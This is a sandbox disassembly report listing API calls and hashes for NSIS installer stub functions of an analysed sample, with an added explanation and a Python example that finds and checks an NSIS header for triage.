                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • Inst, xrefs: 00403017
                                                                                                             • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 00403187
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • soft, xrefs: 00403020
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                             • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
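The function above (GetModuleFileNameW, GetFileSize, GlobalAlloc, with the strings "Null", "soft", "Inst" compared in sequence and the failure text "Installer integrity check has failed") is the header-locating and size-checking routine of the Nullsoft Scriptable Install System stub, not logic written by the malware author: the NSIS loader scans its own image at 512-byte offsets for a header that starts with 0xDEADBEEF followed by "NullsoftInst", then checks that the data length the header declares still fits in the file. The Python below is an added example, not part of this report and not code from the sample or from NSIS; it re-implements that scan and size check from the public NSIS firstheader layout (flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data, with the FH_FLAGS_* bits) so that an analyst can confirm a suspect file is an NSIS installer and read the embedded-data sizes before unpacking. The test image it parses is constructed inline.

```python
"""Locate and sanity-check an NSIS firstheader in an installer image.

Added example, not part of the Joe Sandbox report and not code from the
sample. Header layout and flag values are taken from the public NSIS
exehead source (fileform.h); the image fed to the parser is constructed.
"""
import struct

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"          # nsinst[3] = "Null", "soft", "Inst"
FH_FLAGS = {1: "UNINSTALL", 2: "SILENT", 4: "NO_CRC", 8: "FORCE_CRC"}
FH_FLAGS_MASK = 0xF                 # any flag bit outside the mask => not a header
STEP = 512                          # the stub only tests 512-byte aligned offsets
HDR = struct.Struct("<II12sII")     # flags, siginfo, nsinst[3], hdr_len, data_len


def find_firstheader(image: bytes):
    """Return (offset, flags, length_of_header, length_of_all_following_data)
    for the first valid NSIS firstheader in `image`, or None if absent."""
    for off in range(0, len(image) - HDR.size + 1, STEP):
        flags, sig, magic, hdr_len, data_len = HDR.unpack_from(image, off)
        if sig == FH_SIG and magic == FH_MAGIC and (flags & ~FH_FLAGS_MASK) == 0:
            return off, flags, hdr_len, data_len
    return None


def check_integrity(image: bytes) -> dict:
    """Mirror the stub's size check: length_of_all_following_data counts from
    the start of the firstheader and must not run past end of file; when it
    does, the stub reports 'Installer integrity check has failed'."""
    found = find_firstheader(image)
    if found is None:
        return {"nsis": False}
    off, flags, hdr_len, data_len = found
    remaining = len(image) - off            # bytes from header start to EOF
    ok = data_len <= remaining and hdr_len <= data_len
    return {
        "nsis": True,
        "offset": off,
        "flags": [name for bit, name in FH_FLAGS.items() if flags & bit],
        "length_of_header": hdr_len,
        "length_of_all_following_data": data_len,
        "integrity_ok": ok,
    }


def build_sample(flags: int, data_len: int, truncate: int = 0) -> bytes:
    """Constructed test image: 1024 bytes of fake stub, then a firstheader and
    enough filler so the declared length is exact; `truncate` cuts the tail
    to simulate an incomplete download."""
    stub = b"MZ" + b"\x00" * 1022
    header = HDR.pack(flags, FH_SIG, FH_MAGIC, 0x100, data_len)
    payload = b"\xAA" * (data_len - HDR.size)
    image = stub + header + payload
    return image[: len(image) - truncate] if truncate else image


if __name__ == "__main__":
    print(check_integrity(build_sample(4, 4096)))
    print(check_integrity(build_sample(4, 4096, truncate=100)))
```

On a real sample, read the file into `image` and call `check_integrity`; a hit with `integrity_ok` true gives the offset at which an NSIS extractor should start, while a hit with it false means the file was cut short and the packed payload will be incomplete.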
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623967057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000003.00000002.2623953413.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623981421.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2623994935.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000003.00000002.2624015630.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
